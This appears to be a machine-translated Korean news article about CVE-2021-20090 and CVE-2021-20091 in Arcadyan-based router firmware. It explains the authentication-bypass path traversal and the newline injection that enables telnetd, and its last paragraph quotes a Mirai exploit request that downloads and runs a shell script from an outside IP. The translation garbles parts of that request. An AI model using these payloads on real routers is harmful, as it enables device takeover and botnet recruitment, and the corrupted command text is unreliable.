17개 제조업체에 영향을 미치는 홈 라우터의 취약점

Arcadyan 회사의 HTTP 서버 구현을 사용하는 펌웨어를 사용하는 홈 라우터에 대한 대규모 공격이 네트워크에 기록되었습니다. 장치에 대한 제어권을 얻기 위해 루트 권한으로 임의 코드의 원격 실행을 허용하는 두 가지 취약점의 조합이 사용됩니다. 이 문제는 Arcadyan, ASUS 및 Buffalo의 상당히 광범위한 ADSL 라우터뿐만 아니라 Beeline 브랜드(Smart Box Flash에서 문제가 확인됨), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone 및 다른 통신 사업자. 이 문제는 Arcadyan 펌웨어에 10년 이상 존재해 왔으며 이 기간 동안 20개 제조업체의 최소 17개 장치 모델로 마이그레이션되었습니다.

첫 번째 취약점인 CVE-2021-20090은 인증 없이 모든 웹 인터페이스 스크립트에 액세스할 수 있게 해줍니다. 취약점의 본질은 웹 인터페이스에서 이미지, CSS 파일 및 JavaScript 스크립트가 전송되는 일부 디렉터리에 인증 없이 액세스할 수 있다는 것입니다. 이 경우, 인증 없이 접근이 허용된 디렉터리는 초기 마스크를 통해 검사됩니다. 상위 디렉터리로 이동하는 경로에 "../" 문자를 지정하는 것은 펌웨어에 의해 차단되지만 "..%2f" 조합 사용은 건너뜁니다. 따라서 "http://192.168.1.1/images/..%2findex.htm"과 같은 요청을 보낼 때 보호된 페이지를 열 수 있습니다.

두 번째 취약점인 CVE-2021-20091은 인증된 사용자가 특별히 형식화된 매개변수를 apply_abstract.cgi 스크립트에 전송하여 장치의 시스템 설정을 변경할 수 있도록 허용합니다. 이 스크립트는 매개변수에 개행 문자가 있는지 확인하지 않습니다. . 예를 들어, 공격자는 ping 작업을 수행할 때 /tmp/etc/config/ 설정 파일 생성 시 확인 중인 IP 주소와 스크립트가 포함된 필드에 “192.168.1.2%0AARC_SYS_TelnetdEnable=1” 값을 지정할 수 있습니다. .glbcfg는 루트 권한으로 무제한 명령 셸 액세스를 제공하는 telnetd 서버를 활성화하는 "AARC_SYS_TelnetdEnable=1" 행을 "에 작성합니다. 마찬가지로 AARC_SYS 매개변수를 설정하면 시스템에서 모든 코드를 실행할 수 있습니다. 첫 번째 취약점은 “/images/..%2fapply_abstract.cgi”로 접근하여 인증 없이 문제가 있는 스크립트를 실행할 수 있게 해줍니다.

취약점을 악용하려면 공격자가 웹 인터페이스가 실행 중인 네트워크 포트에 요청을 보낼 수 있어야 합니다. 공격 확산의 역학으로 판단할 때 많은 운영자는 지원 서비스의 문제 진단을 단순화하기 위해 외부 네트워크에서 장치에 대한 액세스 권한을 남겨 둡니다. 인터페이스에 대한 접근이 내부망으로만 제한되어 있는 경우에는 'DNS 리바인딩' 기법을 이용해 외부망에서도 공격이 가능하다. 라우터를 Mirai 봇넷에 연결하는 데 이미 취약점이 활발하게 사용되고 있습니다: POST /images/..%2fapply_abstract.cgi HTTP/1.1 연결: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; 컬+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

출처 : opennet.ru